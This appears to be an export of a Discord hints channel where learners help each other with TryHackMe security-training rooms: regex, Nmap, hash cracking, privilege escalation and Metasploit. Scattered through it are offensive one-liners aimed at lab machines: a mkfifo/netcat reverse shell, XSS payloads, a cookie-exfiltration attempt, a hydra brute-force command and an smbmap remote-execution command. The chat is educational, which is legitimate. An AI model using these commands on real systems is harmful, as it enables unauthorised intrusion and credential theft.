#room-hints

pog

but yeah

One reason alone is that he left after the mute which is ban evasion, hence the immediate ban

Albeit that's coupled with several other issues

you don't need to elaborate anything to a random dude

That being said, typically we're pretty transparent about all of this

I was just curious

no worries!

have a nice meal 😄

Don't worry about pinging us for stuff like that -- our openness/fairness is something we at least try to pride ourselves on. No one's gonna ban you unless it's pretty serious 🙂

that much I figured out by myself 😅

but I've been yelled at for pinging people way too many times so I just apologize beforehand unless someone is expecting a ping

Heh, only thing we ask is that you don't DM without permission. Pinging is fine 🙂

Unless it happens to be something that needs said privately to a moderator

Specifics being here

!rule 1

Rule 1: No unsolicited direct messages (DMs) to other members of the discord. This includes staff. Verify that the member you are messaging is ok with you sending them DMs. The only exception to this rule is if a situation warrants the involvement of a moderator in order to handle something such as harassment or a situation where another member of the discord has made you feel uncomfortable.

that makes sense (been a while since I've read the rules ngl)

but I do remember that one

RIP DevGuru, you were good to us, but it was your time.

It's still available?

Oh RIP, locked

Nah I think they pulled it cuz they banned creator

Well, I had fun getting to www-data at least haha

what? what’s happened?

Trashed the mods

#room-hints message

omg

Ohh 😦 I was doing DevGuru, can I ask how you guys exploit the box..

Is it Gitea API

the room won’t come back??

It's locked at the moment.

Hope that it will comeback

ok

Discord and site bans are independent.

The staff did not pull it.

I finished the room today, my luck hehe

yup zayotic pulled the room himself

symfonos as well i think

i even finished my writeup ;-;

Omg, so happy to hear that, cuz I stuck with the room days...

want a link?

Thanksss

You’re so cool, thanks man

Ahh yeah I noticed it said owner locked. Perhaps he's gonna upload to vulnhub or something. Or maybe he'll get over himself

yup its goin to vulnhub

That's really sad to hear , I was so close to getting a foothold xD

I am doing the Regex room and i am stuck at task 2 question 4 , can anyone help me and explain as well how you got the answer ?..

BRUHHH

and i was abt to complete

it

@dull pulsar can you send me the writeup

ah sorry, it was released again so i had to private it

i shouldnt have released the writeup in the first place but i had assumed it was taken down

lol no worries i am just happy that i get to actually complete it

he pulled out his 2 other rooms tho

ah yea those were moved permanently probably

answer that worked for me is : ||[Ff]ile[1-9]||, but tbh, there's a problem with the question since it does actually match "file8" as well for example

or maybe I misunderstood something

Oh it's up again ? sweet !

Any hints?? no sessions at all and I followed every step

Your LHOST is incorrect

You need to set it to your Tun0 ip

Try typing ip a s tun0 and it should hopefully give you the correct value

tip: you can do set lhost tun0 so you don't have to look up your address

i did this

I'm going to start over

MS is hit or miss generally. this can happen even if you do everything correctly

make sure your payload is correct

also it might be an issue of msf6, cause many people reported problems

but I'm not sure

Well, it's not working

😂

hello, im stuck to privesc from www-data on devguru room, any hint?

can any body explane me this code

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_IP> <PORT> >/tmp/f

Have you tried putting that into explain shell?

Is there a machine which teaches manual sql injection?

check advent of cyber 2 - day 5, there's learning material, a place where you can practise, and also a link to another room about sqli

Yup you can see portswigger labs 😀

Hi guys,
solving the room "Empire" and there is one question i don't manage to solve. and can't find it anywhere.
Question: What MITRE ATT&CK technique is associated with powershell/trollsploit/voicetroll?
i'v searched on "https://attack.mitre.org/techniques" but can't find the category.
can anybody help?

Hi all,
there is one question i didnt found the right answer on "Nmap Room"
Q: Why are NULL, FIN and Xmas scans generally used?
A: ******** *******
i know the scans are have no SYN ASK RST flags set and this three are more "stealthy" but i didnt found the right sentense for the question?
Thank you all

Look at the last paragraph the answer is there

thank you. done!

Hey! I'm lost on task 12 of ctf collection 1. Can someone give me a little nudge?

Checkout the hint😉

did

still nothing

It's right there

Tryhackme reddit *,.... Like that, might help

got it

thanks

stuck on nmap 12 question.. can someone help ? [NSE Scripts] Searching for Scripts Q:

Read through this script. What does it depend on?

hint :- Look for dependencies = {} in the Lua script.

Find the source code for the script

Control F for that string

Thanks

@stuck fractal Thanks

There is a reason given for this -- what is it?

Note: The answer will be in your scan results. Think carefully about which switches to use -- and read the hint before asking for help!

can someone help on this

Did you do what the hint says?

Yes

So I am in THM Regex task 2, question 4, and I am stumped as to why this is not working [a-z,A-Z,0-9]

well for starters you don't need to put a comma in there, and there's an example in the room that says exactly how you combine 2 separate charsets; like this [a-zA-Z]

aside from that, if you've gotten to the point where you need to define manually that charset, you're doing something wrong (not outright wrong, but at least wrong for the purposes of this room)

because there's a much more simple way to do that kind of thing

if you need help on a specific question though, pls post it here

Yes I am a beginner so thanks for noticing. I have read the room content numerous times, and I am trying to match file 1-7. file[1-3] will match file1, file2, and file3. I put, file[a-zA-Z0-9] and nothing? ill get it. thanks?

thoughts?

That will match a lot more than files 1-7

Why did you add a-zA-Z?

because of the capital and lower case fs in file

But

You're already specifying file in the pattern

file[1-3] will match file1, file2, and file3 that's the example given

yeah but the characters in the charset are matched in that specific position

you put it in the end of the pattern, so your validator will look for those letters in the end of the pattern, so after the "file" part

remember, one charset = one char, unless you say otherwise

I feel like the example makes it very clear?

well, I'm elaborating because they said they're a beginner

Sorry that sent after your messages

Am i the only one who got devguru room turned into undefined right here? Currently the room is 404 not found

It's no longer available

Why tho?

check #room-bugs and you'll understand

Ahh ic

How would you activate all of the scripts in the "vuln" category?

im stuck!

Have you checked the manual?

yea

you know i have

im stuck

--script vulns

that that was it but no

The answer does not have a space in it

As you can see by the answer format

really cuz i wrote both ways

sorry for the format is not alway spot on

factts and their are typeOs all over the site

it is.

Report them if you find them, don't complain here.

lol

wow

so cuz i have answer for your response now you catching a hissy fit

No.

This is the room hints channel

Not the "Complain about site typos" channel

lol

i wasnt

i stateing fact that you cant fallow the format for clue if they dont always match

dud

whatever

it fine

They do match though.

ok sir you said no spaces

ill try

it worked ty

Let's be nice please 🙂

can anyone help with the room ALFRED

It's always best to directly ask your question

Then we'll know if we can help

im having trouble creating the reverse shell

You're missing the port if you're using the attackbox

See the 405 error?

That's what happens when you GET / on the attackbox on port 80.

i set up a server on 8080

and i still get that error

i think i did it, i had to put the powershell file in the root folder

That's a different error but yeah

That was a 404

what am I missing [a-zA-Z09]? I may be overthinking this.

Again, why letters?

The example regex is file[1-3]

So match the string "file" followed by a number that's in the range of 1-3

why are these not working, Im using regexr too. *ile[0-9], \wile[0-9]

Because they're wrong.

Because you know 'file' is what it starts with.

at that point you haven't been introduced in metacharacters yet. the regex room has a guided, hand-holding flow.

if you've understood the material then I suggest reading the notes again in order to understand how you should think. you're not being specific enough.

regex should be simple and specific, but if being more specific means much more complicated regex, we don't get more specific.

also pls note that * is not a wildchar in regex. that's the . dot.

Which RFC defines the appropriate behaviour for the TCP protocol?

nmap course. stuck i cant figure what it referring to?

It's int he text

RFCs are documents defining standards

They have a number, like RFC 1918 which defines Private IP space

ah well that sound lil bit more clear let me see thanks

no cant see to narrow down what these 6 digits it wants

i dont see it?

It's not 6 digits.

It's the name of the RFC

Like RFC 1918

Hi, I'm trying regex room and I'm stuck with "Match all of these emails while also adding the username and the domain name (not the TLD) in separate groups (use \w)". I've tried ||"\w+@\w+.com"||, ||"\w{1,}@\w{1,}.com"||. What am I doing wrong?

put those in spoilers 😄

you're doing wrong at least 3 things, but if I outright tell you it will be giving it away

|| spoiler ||

there you go

you should read up again on 1) wildcards and 2) groups

you've got most of the theory down well enough

ok, I'll try that, thanks

I m here

Hey guys, for people who did the owaspjuiceshop room, there's something that i find ... unlogical in the questions

the first question is 'what is the admin email'

that's easy to find

the next one is 'log in as admin'

here they use SQL injection on the user email, thus validating it as true and logging in as user with id 0, which happens to be the admin

doesn't it make more sense to use the admin email you found in the previous question and use sql insertion on the password field?

it's a small thing, but the point where you validate email as 'true' and end up in the admin account is a bit shady to me

I did not do the the juiceshop...i thought It would be easy..but it's hard..sorry for that

haha, no problem at all
it's on the beginner pathway tho!

But still I will do it in few days

i shall be awaiting thy response!

Did u tried brute force?

it's not that i can't get past

Any hint?

i just find it illogical that you do it like that
You have the email of the account that you want to access

why on earth would you use sql injection on that field

instead of just using the email and sql-injecting the password

it's a small thing

Password field

Dont get the structure of the answer

I read up on the RoguePotato exploit

Even I did not get it.

I m ultra pro max Noob

i dunno -.-

ok. I got the first one

What was that..

Google rotten potato instead

Ok

It's a hint. @ashen scaffold

??

Something like that

Got the 2nd one

Read an article called "Gamer Over Privileges" at shellz.club @dire maple

OK thanks

I am guessing those are commands within the exploit itself?

It looks like it anyway

For [Day 5] Web Exploitation Someone stole Santa's gift list!

How are you supposed to find the web panel link

I figured it out using the hint

but is there a way without it or is it more of lucky guessing

(Advent of Cyber 2)

#778305825797177374

@prime lichen It doesnt matter usually the person with id 1 is the admin account thats why you login as admin

Did not know that, thanks

on the room 'Jeff' other than guesswork ||is there any way to know, that the host is running the tar script with wildcards, on the files in the ftp?||

Hello! I'm working through Pickle Rick and managed to complete ingredient 1. For ingredient 2 I've found the file and the location on the server (through the webserver) and i understand that i have a limitation of commands, so i tried a couple reverse shells, ssh bruteforce looks like its out of the question cause its key based login only, i tried wget to the python simple server to see if i can get files over and my attackbox shows the get request, but i can't find the downloaded file anywhere in the system.

Just looking for a nudge in the right direction

thank you! 🙏

I also thought maybe I could escalate my webapp login by looking at the login cookie, but ended up at a deadend on that as well

what optional argument can the ftp-anon.nse script take? I am not sure what they are asking for the answer

Open up the script in a text editor.
Most nse scripts are well commented.

Can anyone help me with some tips? I am stuck in Exploting Telnet in the Network Services room. I am still unable to run commands inside the telnet server. I follow the command lines available. There must be something I'm missing but I can't figure it out.

@neon orchid Can u show me screenshot here ?

Thanks for the hint! I was going insane with the question!

I am currently doing Linux: Local Enumeration and I still have one question to answer. Task 6 Number 2. I used the "find" command to search for a *.conf file, but I get about a thousand results, how am I supposed to know in which file is the answer to the question?

redirect garbage using 2> /dev/null and look for a file that has sus name

sus name? Yeah I did the 2>/dev/null part, but still get 1000 valid files.

like password, flag.

are you using the file type *. conf

inside find cmd

I'll give it shot, cheers

Can anyone give me a hint on regex room? matching IPv4 address? My best solution is || (\d(1,3)\ .){3}\d{1,3} ||

in room lle.
I've generated a ssh key "ssh-keygen" with empty password
moved the content to my attack box to manager_key
chmod 600 manager_key
and now trying to ssh into the box with ssh -i manager_key manager@ip
but being prompted for password am i missing something ?

could you call the full name of the room

@white salmon sure sorry Linux: Locals enumeration

you need to add the public key to the autorized_key file

@white salmon DOH... thank you

you're welcome

Morning

Looking for a hint/help on OWASP Top 10 > Task 18 IDOR Challenge

Seems very straight foward, change the 1 to another value and find the other users notes. I've ran 1-100 through Burp intruder and no other notes found, I've verified my method by confirming burp value for the return was success on ?note=1

Fuzz from 0 to like 1000

Well intruder is on 97 of 100 so it hasn't completed 🙂

Just completed, only one 'value' returned anything other than 179 and that was ?note=1

let me bump it up to 1000

You're gonna be better off using something that isn't artificially throttled

Zap, wfuzz, ffuf

Cool, thanks, let me try with one of those.

Fuzz was much faster and should have definitely started at 0 😉

I meant Zap was much faster

Thanks

well your solution is correct, just use "{" instead of "(", it gives you ||(\d{1,3}.){3}\d{1,3}||

there's a \ missing for .

hint

Filter the wordlist down to just 4 character passwords

ok

now i got it

If you think about it, the reason it's taking so long is because it's trying incorrect passwords. Remove a bunch of definitely incorrect passwords, and it'll go fast

i read about it. It will break my heart to stop my process after running 1 hours..but thanks for the Hint really helpful

In Network Services, I am stuck when I try to ping my machine from the telnet session. I typed .RUN ping [my IP] -c 1 and I don't get any response still. Can anyone help me. Here is a screen.

You're not running TCPdump

it seems to be working?

oh wait is that where i'm supposed to be looking?

it does look like ping responses

well I'm an idiot

hi

can u help me with nmap room?

What optional argument can the ftp-anon.nse script take?

Find the documentation for the script

It gives you that information

thank you ❤️

It's stuck on this ...

I don't think it's stuck

That's a new line

it's ready for another command

I run another command and it just gives another new line each time

It's not executing my commands

Yea

It is

It's blind code execution like the room tells you

You don't get the output

But it's running

Oh, is that why I need to have the tcpdump?

Running on local also?

Yes

To recieve the pings

I was totally confused 😅

If the pings go through, that means you can run commands etc

Got ya! Thank you!! ❤️

i m facing issue

what issue?

i m in crack the hash room

i m stuck at the last 2 task

Hitting Regex again today, yesterday was rough, regex q4 in thm, none of these are working? [Ffile1234579] , [Filefile0-9] , these work in regexr?

it's showing no password hash is loaded when running the john or hashcat

it's gonna match every char in your charset, so if you have for example "ifil9", it's gonna match every single char in this string
what you want is more like ||[Ff]ile[1-9]||

@thorny wind We don't provide answers or flags

Probably not, if it's not working

Ok, so then move to #room-help and check the writeups

Can someone help a newbie out? Im doing the NMAP room and stuck on "Perform an Xmas scan on the first 999 ports of the target (10.10.78.136) -- how many ports are shown to be open or filtered?"

Getting this:

What am i doing wrong? Been looking through earlier posts - but couldn't seem to find an answer.

A hint and not answer is appreciated 🙂

You successfully scanned all ports. You should see your answer there already.

I mean the ports you needed to scan returned the results. You have it on your terminal already 🙂

@torpid onyx Check the hint, you're missing verbosity options that will give you the info you need

omg

thanks...

OK.... So that one is good, but all of the ones I put into regexr gave me legit results, by hitting all of the required characters. It does say there are multiple answers, so were any of mine wrong? Or does it depend on what you are looking for?

Open the script in a text editor they are normally very well commented.

I'm working on the hydra room, and I think I'm getting the username wrong. I was pretty sure it's ||molly||, but it's not working with ||rockyou||. The bruteforce is definitely working, just not getting me anywhere. Any tips?

[fF]ile[1-69][^7] regex task 2 q5...am I close?

Show the command?

||hydra -l Molly -P /usr/share/wordlists/rockyou.txt 10.10.163.45 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V -I||

Thanks

That's not quite right

Capture a legitmate request. You're sending data to the wrong location

👍

Thank you

Oh, I'm dumb, thanks. 🤦‍♂️

Does someone know a good oscp like linux buffer overflow box?

@rigid dagger OSCP won't be a linux bof

It's guaranteed to be a win32 bof

Lol? really how do you know that

Because I've done my research?

They teach both in PWK but only assess win32 bof in the exam

But is it 100% windows?

Win32.

The bof.

Other boxes can be whatever

Okay never heard of it thanks. That means i can chill now xD

For the room : Easy Peasy

To root the machine, can't we just cat out the root.txt file ?

By this i mean in the executable

best thing to do is to try it @sacred inlet and see for yourself

It worked, but there is a little messing around to do

excellent, well done

👍🏾

we have a channel just for aoc2 help @tribal olive, try #778305825797177374. Be sure to say exactly where you're stuck if you want only a hint, you're not really giving much context there, what have you tried, what do you see, etc?

Thanks @median compass didnt notice that there is a channel dedicated to advent of cyber 2

furthernmap room task 14 help

what am i doing wrong?

there's an error message in your screenshot

nah that i tried a while ago

also now

hello fellow humans! Doing the DailyBugle room and struggling a little with the joomla python script. Getting error messages when executed against the machine

joomblah.py script its called

traceback (most recent call last):
File "joomblah.py", line 3, in <module>
import requests
ImportError: No module named requests

Install requests? @twilit notch

already have that but maybe try with python3?

my python is satisified with what i have already

you need to be careful that you have requests for the right version of python

a pip install requests will fetch it for python3 these days now that python2 is deprecated

if you have pip2 installed you can fetch it for python2 with python2 -m pip install requests

if you don't have pip for python2 you can install it with wget https://bootstrap.pypa.io/get-pip.py && sudo python2 get-pip.py

thanx @median compass i needed to execute it with python2 with request install. i tried with python and python 3 and did not work

if your attempted shell doesn't work then try another, sometimes your shell might contain a fitered term, like bash for example

oh, you deleted it lol

ah well, good luck 🙂

python & python3 are most likely the same thing since python runs the default one in your path (most likely 3) : )

only since python2 is finally deprecated, older distros probably still have python linked to python2

Hello. Looking for some help with the Kubernetes and Containers Security room. When trying to escape to root using the twitter command with --server the terminal does not finish the operation. If I type ctrl + c and list the pods, the newly created pod appear as Ready 0/1. What am I missing?

do -Pn as the nmap suggests you to, and you'll probably want to add -vv for more verbose output

also I'm not 100% sure but I think you need to put a space between -p and the port range (like -p 1-999)

nah

no space needed

Nah i tried that combo too

as I said, not 100% sure, it's one of those things you don't use that often and just spam combinations until you get it right

But NVM I'll try tomorrow and hopefully somehow things will change out of the blue 😅

not sure what's wrong then

Thanks for the input tjo

Much appreciated 👍

yeah, np

anyone have a hint to where to look for this What is the name of the role who's job is to identify attacks against an organisation?

ive tried everything

soc analyst?

No sadly

Honestly that's a google question

i know but i still have found nothing

I'm pretty sure it's covered in the material preceding the question, no?

you are indeed correct

i thought i already tried that

apparently not

thank you

CCpentesting room Task 20 last question: ||Given the username "admin", the password "password", and the ip "10.10.10.10", how would you run ipconfig on that machine|| I am putting ||smbmap -u admin -p password -H 10.10.10.10 -x ipconfig|| I have tried it afew different ways but I am not sure what I am doing wrong.

nm got it

@balmy wedge please don't post answers.

Need help on Linux: Local Enumeration

task 1 getting a reverse shell using cmd.php by uploading it

Any hints

any idea.. when DEVGURU room will be live?

@white salmon never
it will be uploaded to vulnhub though

why so? oh! i was so close

Hello everyone,
I am stuck in Empire Room, Task 8 , Question 2.
Please help me thanks you all 😄

@pseudo wraith Perhaps you are able to find more information somewhere on mitre.org?

@white salmon it's there right now, no panic

Hello guys, I'm on the Kbernetes room and I try to use the POC of Diana, but I have an error saying that " pkt[IP].dst = 127.0.0.1" syntax invalid.
I don't understand why I have that because is a string so it should not be a problem

NVM I got it :

!

You could check that on vulnhub

@neon summit yes already done bro , tried many techniques ID but failed 😦

Hello please I need advice in regular expression room task 4 and questions filenames ab0001, bb0000..... and question notes~, stuff@....

Hey, When using hashcat I am facing a problem. It stops after showing this -- > Approaching final keyspace - workload adjusted.

can anyone help

Command?

.\hashcat.exe -m 0 c328399e2bd12fde395bb044283fc60e 'D:\InfoSec\Wordlists\rockyou - Copy.txt'

you should precise the attack mod no ? with -a

or maybe the default one is 0 , I don't know

ok

hashcat.exe -m 0 -a 0 {hash} 'wordlist'

but the easy hashes were being solved without -a 0

What is this error?

it says you didn't load any hashes

cause your hash doesn't match the token length

but this is a thm task

don't show answers

sorry

try wrapping the string in quotes, 'cause to me it seems that it's trying to interpret the string instead of just taking it in as a hash

The $ is used to access variables

You want to use single quotes

yeah

have you tried using https://regexr.com

you can make your own test cases to see if you match the strings

Of course just tried but still can not figure out how to reach that

try the charsets without the -

split it up into sections, first you want to define a charset and a number for the ab part, then another for the numerical part

The software using the port 8080 is a REST api, how many of its routes are used by the web application?

This is for UltraTech, Task 2, Question 5.. How do I go about checking this?

It is 1AM, so maybe my brain is a little fried.. could just be the wording of the question

haven't done it i'm afraid @dusk imp

If James pops in here, he'll know..

He knows everything.

also I encountered this error too..

the passwd is in rockyou.txt

What's the command you're using?

put the hash in a file.

hash.hash or whatever

.\hashcat.exe -m 1400 -a 0 -O "b0ba87b4443577541fa3c9a30eb640a68f082f4022e3127f1289f53741eda3ac" 'D:\InfoSec\Wordlists\rockyou - Copy.txt'

ok

Especially if you know the password is in rockyou.

My usual command is just like hashcat.exe -m <number> hash.hash rockyou.txt

Sometimes I'll append -O

ok

are you positive the password is in rockyou?

yes

still same.. if i use this command

yes

I hashed a word inside rock you for checking

what room, task and question are you doing?

crack the hash room

this is the password

of the hash

ok, but that hash isn't one of the questions in crackthehash, you're just doing an extra one for the practice are you?

for this one.. ye

yes

ok, I know the issue here

you need to add a -n to your echo command

otherwise it's appending an invisible \n to the text

that's the one.

what does that issue mean?

for example Reyan

ok

notice how they're different hashes?

the first echo appears like this as plaintext "\namor2630"

the second one gets rid of the newline char, therefore making the hash "amor2630"

Yaa... It worked

thanks..

No problems.

But what does that error mean?

means Not found?

which error?

the keyspace one?

Approaching final keyspace - workload adjusted

this yes

it's not an error, it's information

it's just telling you that it's running out of hashes to cram into its cracking algorithm

ok...got it

you could still get a crack if say the password was the last one in the file

yaa.. i tried

@indigo pewter Did you get the room figured out?

Yes

Many tries but still can not figure out on that

Hi, I'm doing the owasp top 10, task 20 xss.. I did both exercises, the Hello pop and the host's IP pop up, but is not accepting the answer. I'm guessing some charachter is missing or something like that.. can someone point me to how is the answer supposed to be spelled? thanks

can you show us what you've tried, and for which question

task 20, both reflectes xss challenge asking for the pop up displaying Hello and the host's IP

I got the payload just not accepting the answer.. can I paste it here?

use spoiler tags to surround it (|| on either side)

||<script>alert("Hello")</script>||

there you go 🙂

thanks, didn't know that.. that's what I have for the first one but it's showing wrong answer

no, sorry, was reading my notes but got confused!

like "There's........................................Think"

that string is your flag

no, on the owasp room it's just asking me "Navigate to <IP> in your browser and click on the "Reflected XSS" tab on the navbar; craft a reflected XSS payload that will cause a popup saying "Hello".

it's not asking for a flag

yes, but when you put in your payload

what do you see?

the JS popup

and that says what?

Hello

and if you enter only ||alert("Hello")|| what do you get?

"your answer is incorrect"

really? I just booted the box and I get the right return, that's weird

||non of these is accepted||

if you do the full XSS payload as you had it

you get a box saying "Hello" right?

when you dismiss that do you get another box?

I don't know how to use the spoiler tags on the image, sorry

that doesn't matter, you're not spoiling the answers there 🙂

when you click Ok to dismiss the Hello box, do you get another box?

I get the Hello popup, click Ok, then it takes me back to Reflective xss site

ok, reset the box then, something is obviously broken

ok will try that

when I click ok, I get another box with the flag pop up

so I'm guessing the answer is not the script, but the correct script is supposed to show me something then..

exactly

nothing.. even disabled the browser's xss protection that they describe there

what's the IP of your target box?

got it now, thank you, capital H was required, duh! thanks again

I’m working on the intro to networking module, specifically the WHOIS networking tool. My problem is when I Whois Fb.com I can’t get the right domain creation date. I’ve tried all the possible related dates and still no dice ?

@zinc bronze could you maybe check what is said wrt ||the full name of the site|| like: whom owns it etc.

@white coral yeah I tried that too and all the info came back the same

could you maybe DM with the output?

I got you

I have done that level, so I could see what's wrong

also have you tried checking the date format?

please remove that image

but have you checked the given date format?

I entered it like 00/00/0000

swap the month and days

I was trying to give that as a hint 😉

lol, im not so subtle

Lol yeah idk what I’m doing wrong then 🙈 I entered it in a couple different ways to see if it would work and still no dice

could you direct message me the output?

DD/MM/YYYY

the date notation is European, though the character split is American

Hello everyone. Further NMAP room. How would you activate all of the scripts in the vuln category

Hint please ❤️

I checked both the man and it’s of no help

which task is it?

@wind peak do u want ans or hint

only

Last paragraph

I was stuck there as well, read it carefully, it's there..

you got it? or need a hint?

I don’t think you can hint without answer lol

@wind peak hint is script

😅

Lmao

||use the switch followed by category||

--script

I tried that with v***

Doesn’t work

which task is it?

Task 3

you are probably missing one sign if you have a space between the switch and category

the answer is in man nmap @wind peak

hint: has to do with a network device

I know it's a very long man file, but you can search it with the / key

I looked in there. Nowhere does it mention vu*n

look for nmap --script and you'll find an example

check here

well that wouldn't be so much an example as an exact reference. It gives the example with a different category of scripts

but you just have to substitute one small piece of text for another

Ima take a break cuz none of these hints are making sense to me lol

dude, I told you to use search (/) and the search term nmap --script

try this

that's not a lot to make sense of is it?

I did lol

I’m feeling pretty dumb right now. Must be burnout as I’ve been stuck here for half hour lol

haha me too i am also stuck on two room whole day

did you get the ssh working? was it something silly I missed?

nope havent got respond from any one in tech-support

@median compass can u help me on metasploit room

what's up?

msf6 exploit(windows/http/icecast_header) > run -j
[] Exploit running as background job 1.
[] Exploit completed, but no session was created.
msf6 exploit(windows/http/icecast_header) >
[] Started reverse TCP handler on 10.8.73.11:4444
[] Sending stage (175174 bytes) to 10.10.252.157

stuck here

🤣

this is a tricky one, there are rumours that the icecast exploit is broken on metasploit6 but I haven't tried it myself, I did the room before metasploit was upgraded and it worked. Even then though it didn't work every single time, so you could try doing it a few times to be sure

msf6 exploit(windows/http/icecast_header) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf6 exploit(windows/http/icecast_header) > show options

Module options (exploit/windows/http/icecast_header):

Name Current Setting Required Description

RHOSTS 10.10.252.157 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8000 yes The target port (TCP)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name

0 Automatic

msf6 exploit(windows/http/icecast_header) >

should i change port of LPORT

i have msf6 and I just tried it, it works for me

you can try changing LPORT, say to 4443 and go again, that might work

can send show options data

check that your LHOST didn't reset to the wrong address, that sometimes happens too

https://tenor.com/view/dancing-cute-baby-happy-dance-gif-7730100

can you dm me your whole answer?

the exploits against windows can be a little unreliable it seems @urban phoenix, not really sure why

hey guys, cannot find anything useful on google for these two questions, I've already tried everything I found , can somebody help pls?

https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens

I googled rogue potato token @sour vector

And it was like 5th link down

thanks, I might have wrongly copy/pasted the first one since I also found it on other pages and didn't work but the other ones don't seem to work for the second one

All good I just found it on another website, thanks for the help!

Awesome!

Any hint for escalating privileges in anonymous room? https://tryhackme.com/room/anonymous

did you check the writeups

It's for hints

This channel is for people looking for hints and don't want to check the writeups

Have you tried looking for any SUID?

Right.. 😅 Thanks!

Would appreciate some help with the Kubernetes room. I can't escape to root on the host and find the third flag. After using the recommended twitter command my terminal loads. I press ctrl+c after and list the pods and I get a Ready 0/1 and Status - ImagePullBackOff. Any ideas?

I don't want to google linux privilege escalation since it says "everything you need is in this room" and I'm trying to stay in the spirit of the room, but I'm really stuck in zthlinux on task 43

Even if you do, it won't help you

I can set out a couple simple facts, and from there you should be able to work out how to get root, if that's good with you?

sure

So:

• Users usually create files in their home directories
• There's more users than just shiba1-4
• Sudo rights aren't that common

yup, nootnoot and noot are users, noot is our admin for sure

nootnoot is our admin

Why do you say that?

Ok

So look for out of place files belonging to each user

find is your friend

he has a "sudo_as_admin_successful" file

yeah, so I'm having issues with find

I guess I have to pipe find to grep to get it to be useful? since it just dumps a crapload of text

Noooo

Don't pipe find into grep

You can add 2>/dev/null to the end of a command to filter out errors

like find . shiba3 was a nightmare and I ended up just cd-ing around until I found it

You remember the > operator?

find / shiba3*

find . shiba3 is incorrect

as is find / shiba3

oh, I did it wrong then

That just lists all files in . or /

Yep.

I really don't understand find

There's a whole room on it

Why not do it and come back?

sounds like a plan thx

thanks Ninja

for anyone who has done the pickle rick room, || do we need to do some image forensics on the files on /assets in order to have an initial foothold or get the password to connect into the ssh server? ||

No

Hello please I need an advice with regexp room question : Match every 9-character string (with letters, numbers, and symbols) that doesn't end in a "!" sign

what have you tried, what's your best attempt so far?

pretty close, \w doesn't match all of the requirements though

and have a think about the length, is it 9 characters plus one more that's not !?

hmm still nothing

letter numbers and symbols?

well unless you show me what you're trying now it's hard to comment on that...

ok, getting warmer

did you reflect on my second hint?

you want a match that's 9 characters in total right?

the last one counts as anything except !

pls put all answers in || spoilers ||

yeah, I should have said that, mb

that is it

thank you

you could probably delete that, it's a flat out answer 🙂

should probably delete the other one too right?

Match all of these filenames (use the + symbol): .bash_rc, .unnecessarily_long_filename, and note1

Please what is wrong in here?? || .+\w* ||

exacly || .*\w+ ||

you want to match the file names but not anything else

what specifically matches a .?

imagine you had a heap of files and you just wanted to match these ones

not sure you need to match that specifically

.* will match pretty much everthing

ok you want to match "file" with either lower case f or upper case F and either 1 or 2 digits

is that too close to an answer?

are you hinting on the right question?

oh shoot

Match all of these filenames (use the + symbol): .bash_rc, .unnecessarily_long_filename, and note1

sorry

i have trouble taking in information

read the intro to the task 3 again @indigo pewter does . do what you want it to do here?

if a char has another meaning you have to escape it

ok but hint in answer box is .*****

right, so there's something before the . then

I have \

sorry

not in what you showed us, so we can't guess what you're doing

damn im good at reading half a sentence and assuming the rest. sarc

sorry I don t know why there isn t

so complete is || \ .+\w* ||

discord removes it, you have clashing formatting, you need to do 2 \ to get one, unless you put then in ` backticks

use the code tags

don't focus too much in writing expressions that match the answer format in the box

you need to understand what you should use and why

• means 1 or more of

otherwise you're just writing random stuff and hoping it will work

read up the task description that talks about wildcards and you'll see how you should use the . dot

I understand but there are many other ways to achieve those answers

the . is optional

yes, and there was no other way to make this room. there's literally countless ways to match some of the expressions. we're looking for the most simple ones and easy to write and read.

remember the modifiers, + means one or more but at least one, * means zero to any number, ? means optional

sometimes even if you know this, it's hard to find the right expression, which is why I'm giving you hints right in the question

@thin bison i cant find the page that talks about the optional character

task3 pood

seriously, it's just 4 pages

thanks,

i see it now

to be fair i didnt actually read most of this

that will be my downfall

everything is TLDR

*sigh*

its hard when your concentration span is about 3 seconds

it's also hard to make a regex room

I've made many changes/fixes in the task descriptions to make everything as clear as I can, and I'm still open to feedback for further improvements

i know, i did a regex lab somewhere but it had javascript

if you haven't read the tasks, why do you expect from someone to help you?

you might have to make a virtual machine, with the lab inside

it's very hard to make a decent regex room, I think you did great here @thin bison

and give out flags when they are correct

its great dont get me wrong

i liked it

the question/ answer format in the THM rooms is not ideal for regex specifically, but it's what we have. doing a whole new VM would be overkill for this, especially since it's something you can test in your own terminal.

this is actually something I didn't even recommend

I recommended you a site like regexr

you can test everything right in your browser.

yeah i use regex101 same same but different smell

Great job!!! I love this room I think that I ve learned a lot so I want to thank you not to insult you

anyway, if someone wants a hint, post your question and then post (in a spoiler) what you have tried which didn't work. I'll try to give you a hint, but sometimes it will just be directing you to read something again

I didn't get insulted, you raised a valid point and I just answered you. I said it myself in task2, it was going to be tricky.

hey, considering what you had to work with, its admirable

i wasnt trying to insult you

again, I didn't take it as an insult. but if you're in here asking for hints, the very least you can do is read the accompanying material which comes before the question you're working on

i wasnt asking for hints i was trying to help

SO FRIENDS can we return to HINTS?:D

even worse lol

still not able to figure out on that

yeah post your question and what you have tried

maybe, flush now with all this good advice and insight, you should try a few more by yourself - edit, that was sposed to have a 🙂 at the end!

well im sensing that im more of a hindrance than a help, yeah im not good at taking a hint, ill leave everyone alone now, sorry for trying

don't think that anyone said that pood, we're all volunteers here, have a great day

you were helping S1Dney so they'll be the one to tell you whether you were helping or not

heey POODy OK you ve helped me but my head is overheated:D:D

nothing wrong with taking a break, come back to it later with a clear mind

or don't come back to it at all, we won't tell 😛

I LL BE BACK :D:D

Hi, I'm doing the juice shop room. In the stored xss question, how do you know the name of the added header has to be True-Client-IP? thanks!

I already did it, jut wondering how you get to that conclusion on the name

Some help with DVWA room, trying to send cookie to my listening box but having trouble

https://cdn.discordapp.com/attachments/521771811768107008/786600085625896960/unknown.png

I can get it to show in an alert, doing <script>alert(document.cookie)</script> just can't figure out why i can't sent it?

I have netcat listening on port 80 and i can do a curl request which shows but cant get my cookie sent

@covert tapir is this a THM room?

